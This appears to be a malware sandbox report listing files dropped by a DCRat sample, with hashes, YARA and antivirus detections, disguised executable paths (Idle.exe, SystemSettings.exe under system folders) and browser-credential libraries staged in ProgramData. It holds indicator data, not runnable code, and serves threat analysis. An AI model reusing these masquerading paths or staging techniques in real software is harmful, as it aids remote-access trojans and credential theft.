SHA-512:	1A8F7918B931FA10CBC4B47A88405C0B28255360AC27E1D44BA00554186ED20139FBAAA278A362C34A20083F4FFF30DC83876C3F382397F831F781FB6A9AAB91
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."..................-... ...@....@.. ..............................K.....@..................................,..K....@..p....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................-......H...........@[..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Program Files\Google\2ad47189800c09

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	ASCII text, with very long lines (775), with no line terminators
Category:	dropped
Size (bytes):	775
Entropy (8bit):	5.890199483984725
Encrypted:	false
SSDEEP:	24:HkXVL1M0AlWuldqOe0uWKrxcaL9RvTckUVmYl1bzD:HkXVK0A3Hpe0LupL4hHl1HD
MD5:	CE4D51E6AED38C85DBB80E202050B508
SHA1:	7759BDB066029ED9E7E9FB05D64999B216D2F1B9
SHA-256:	D0CB0205AF4A14CE851D6BF769CF2B9ED44CB917069E956525C0DDBAD6422A9A
SHA-512:	AEACDEBE4FDAFBCC61E557E70B87BEC297DF5CE49D39552AA419FF884788FB4B420956230ECB9BC18BA7BCFA01A2A9BCBA885B4EA5298BE3082BF2D78BF875F7
Malicious:	false
Preview:	WhKHVbriHglru317BBQ5AaStcU4T3Jk4Wx7B0jscV8VPCwD8lgWIuNv5OaoAgYp85qU65zHcSxjCEDqqR6sXwcJJCBxZ4s66SXTVbGCvY4z6ns0Kt8tkqSLchK43Brhk1ntrtVOK3682mMgTLnp59WQAL0yQMItrWPFA8JaYuiqtTS0UoksYBllfWtf3g78uMRgXHgUBNRLapgr3AdmlZVpuoknPnh1wk6hCwdMIPqKuaK0zCm2CVWU0mwsh2FXqZY0s9pHhRdVtL4TetyNBoybNlqZAupQKSeVCUHzXeUv1AlprcOxD1WBk6mHTPHwlNKaqjRKm90hUDkM9Arhg1MS6duFr9fHXhKozL9IKDKEBzqhWZIShjQtA2dMyMcndsJw26XxBjXcrIQHwMtR1NkyRan7swT8lhlTp4oaCUQ8LxC2lValcKwPHUecSZEPPZ1Jg7c1iSPg6mmeXvWXVsfavVLUaMHnQBtw52Vo2iDJ5PTfs9EgCq3h3bYLvHbWLlQ42zjeasfxoVefBpmaHlkjHM3deJ2vGr8T9Ym2akGULG2i72JFfBOkBqxq6FAQztq6WKfnDt9hePXATUglAxQFcYSSl66Vj0eca6LwXgCvBrFvTwXliYQCdke72NBHxn7ou5kXJuOdueEuTg8ziUxLkc8zbO3Jf58XubAYLAcxJwS9gtoWOMic0vES6u541E8zgqA1fkni29BxJ9Tsjh5SWfh8XrbbEh6Fycczsw1njAk0uQJ7aMVUJpcAJBexILdUD69r

C:\Program Files\Google\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1709568
Entropy (8bit):	4.871474066048546
Encrypted:	false
SSDEEP:	24576:2YCGLO9L8YXprwCw7lTxvvNlm5hK+iYBKUOzXQAY671:3CGq9pXprWu/XhtA
MD5:	579FD24F4CACC972F63F47214F9C3C34
SHA1:	20BE9C6E9AA29D57B670D6809FFAD1786A8508E5
SHA-256:	F80BD8EB42194DF565E3152D35BAD6A40FDAE70E221E9E66873587BFFB73D64B
SHA-512:	1A8F7918B931FA10CBC4B47A88405C0B28255360AC27E1D44BA00554186ED20139FBAAA278A362C34A20083F4FFF30DC83876C3F382397F831F781FB6A9AAB91
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."..................-... ...@....@.. ..............................K.....@..................................,..K....@..p....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................-......H...........@[..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\6ccacd8608530f

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	ASCII text, with very long lines (329), with no line terminators
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.7833488686297265
Encrypted:	false
SSDEEP:	6:oVq3qMIBlyysj5xFTVHmOPhuFDsdvCuOG6n6Lrof4B6Rq9B1ooMNuwS2luqyn:1qLlyXj5xFZnhdvrOGJvD1ooM0wSfR
MD5:	5926A9168DE3BFD6430E6B4BFBF8A2E7
SHA1:	CDC60D55F026F3229D0D7AB1E046BCB42875B1B3
SHA-256:	7EFF0E18B76C046D953DBF1F007A430C10503B69DACE1651B6B2886328A3B9E3
SHA-512:	D6450C3B40108CF346DD48DA3EFDD0A63540E11674C98B8AEB402168A0C1E594EB58B41FBFBBA6674FCC437E9134522AE74B7C095620433295C23545C31D77BC
Malicious:	false
Preview:	uWLAnKouz1dY1oLEhyYFfUuIokxGwINg60DuOyrST1Bp8VCmyDHi4pyamCWDWh8qo6cBkaztGGvnTEKThLSsBomRBnIMbo5w3UBC2BBYNXcx3LHi2DfLPQp9TL97SnRcL9u8DIagJ3enLyX0fjUYItgmpBsrCDFkGAm3aIfum8BVvBxfxIbsT2TbdHSBZseGy3gLLdaXEkwJsK1nNM43lXQNqLaSzdU3e5h1flTTsEntGJsSQpxMylebmSfACHhlP2pxn9Il3kKhthHhcICKpHF3aGOMGTQlhCdNd5oQgMTNa7sFK8h4EX5IwwWhu5fjTiAqE4Dhd

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1709568
Entropy (8bit):	4.871474066048546
Encrypted:	false
SSDEEP:	24576:2YCGLO9L8YXprwCw7lTxvvNlm5hK+iYBKUOzXQAY671:3CGq9pXprWu/XhtA
MD5:	579FD24F4CACC972F63F47214F9C3C34
SHA1:	20BE9C6E9AA29D57B670D6809FFAD1786A8508E5
SHA-256:	F80BD8EB42194DF565E3152D35BAD6A40FDAE70E221E9E66873587BFFB73D64B
SHA-512:	1A8F7918B931FA10CBC4B47A88405C0B28255360AC27E1D44BA00554186ED20139FBAAA278A362C34A20083F4FFF30DC83876C3F382397F831F781FB6A9AAB91
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\Idle.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."..................-... ...@....@.. ..............................K.....@..................................,..K....@..p....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................-......H...........@[..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\ProgramData\CGDGHCBGDHJJKECAECBAEGCBGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECFHCGHJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCBKECAKFBGCAKECGIEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\GDBFBFCB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIECFIEGDBKJKFIDHIEC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJDBAFIECGHCBFIDGDAAAKEBFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJEHJKJEBGHJJKEBGIEC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x29c088cd, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221676683706291
Encrypted:	false
SSDEEP:	1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
MD5:	85C064C206FB5B58CC092F225AD5279B
SHA1:	759D531FBB251E8D3D9C931214BFF9370D999BF4
SHA-256:	A4F5878336FF0E6C4BC89ECF5DE228A45F19AC16EB4E5E019CA14C33893EF68F
SHA-512:	3A83053D4F867220B531E68AA83AD4169973281C4ABB7EF07E2161D65D68BF8BDC42FE596FA4CD6158F66456DEE67236839CA3A5256ECBD463A9724057A848CB
Malicious:	false
Preview:	)...... .......A.......X\...;...{......................0.!..........{A..4...\|Y.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................k...4...\|y...................uC.4...\|Y..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Package Cache\9e60a5f7a3bd80

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	ASCII text, with very long lines (442), with no line terminators
Category:	dropped
Size (bytes):	442
Entropy (8bit):	5.863188057064535
Encrypted:	false
SSDEEP:	6:ONbwSSjh9XwSoz/nu+/tMTpm3QGnSqDknugWKE9CbC96fdI7sNpBo/6wP/TgB594:unSbsu+/69mgXqDknzWKH75BoSmgBLKf
MD5:	3663054617649C843522BA11A84EF546
SHA1:	1881892A5DA647ADCD010A22010BC6BFA4EAA6ED
SHA-256:	F7A49E28745B54783C745B032F94F868D591A6ADAD197A9914C01DDD2F99418B
SHA-512:	B8AF6EA24544376748F6F9DFBC9FA95611FF7BDB231C241E40A97ABCEF2E9FA55E9799734A4CA61EC4474011585EF6773AA9EEAB1C18761D8FBF9CC85819F020
Malicious:	false
Preview:	12NMuTS2CcOxlSJ9VLjfvA7Zu80JI9OTYeahssS7jrd4NvARS7YHf8p14xcwdItCN4ZG1mQn2m5EgCL88i1KlHyZzjm4Qgdb8brSV3apqvP2ClU1mdy4QibGGARR9WWWIeFFV2nEILd025WNPuSwrjKZ9lMVmIpUY2tifOgt0twEEkOKnEBPEkojTqGtqRc9gJc9LyrBNj68wGVZXBshHaQyNKOzIxCiRxi4IO8yWABenqxNVqVpj41F3ovBk23agYr8haQJC3LGZvKhXAdbbX8W5dBec7NdHl8P9yp5aMmqsvqIdOokZb8JaUDEYwqFqs9yx5hjUiAPuSoKw3ANTmEpmyzovlgofh99v2UiqFQ0atZHq2RevdwDoTL8F2xtBWuNSoZ4icgNWNP2Zr82TC3Cu6VcqVdxRhzE9LzCdX5T6iqaESjY45Z9dr

C:\ProgramData\Package Cache\SystemSettings.exe

Download File

Process:	C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1709568
Entropy (8bit):	4.871474066048546
Encrypted:	false
SSDEEP:	24576:2YCGLO9L8YXprwCw7lTxvvNlm5hK+iYBKUOzXQAY671:3CGq9pXprWu/XhtA
MD5:	579FD24F4CACC972F63F47214F9C3C34
SHA1:	20BE9C6E9AA29D57B670D6809FFAD1786A8508E5
SHA-256:	F80BD8EB42194DF565E3152D35BAD6A40FDAE70E221E9E66873587BFFB73D64B
SHA-512:	1A8F7918B931FA10CBC4B47A88405C0B28255360AC27E1D44BA00554186ED20139FBAAA278A362C34A20083F4FFF30DC83876C3F382397F831F781FB6A9AAB91
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\Package Cache\SystemSettings.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."..................-... ...@....@.. ..............................K.....@..................................,..K....@..p....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................-......H...........@[..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2576896
Entropy (8bit):	6.515292162147194
Encrypted:	false
SSDEEP:	49152:YnOZ9QvwKXH3cPc0pzP+rVHmBwZ66BMW3voSmpcOotQam1ZXddd23BgXJ8jsbwW:YnOZ6v/H3aFVP+BAwZ6RyQd6xmDdjSB4
MD5:	D16E6918118A615A302759477165E256
SHA1:	B19C5484666B5F05D39946562D69ECF4476A7488
SHA-256:	D6740630F206D849F2329A794C862ACAC202F8B984B843DE0C35848417F65B23
SHA-512:	C4FEBC8E482F2169C4D028383D1A195A6BC3B604E6FF5297267FB43E8502FFD3A52A09957F3112DA8958A08EB76B2E0C292303C582E248548487C737B97955DD
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...H.Ug.........."......N....'.....@..........@..............................'...........`.................................................8p..<............p'.h.............'.x............................`..(....d..8............q..P............................text....L.......N.................. ..`.rdata..,....`.......R..............@..@.data...p.&.......&..j..............@....pdata..h....p'......J'.............@..@.00cfg........'......L'.............@..@.tls..........'......N'.............@....reloc..x.....'......P'.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: S1NrYNOYhZ.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
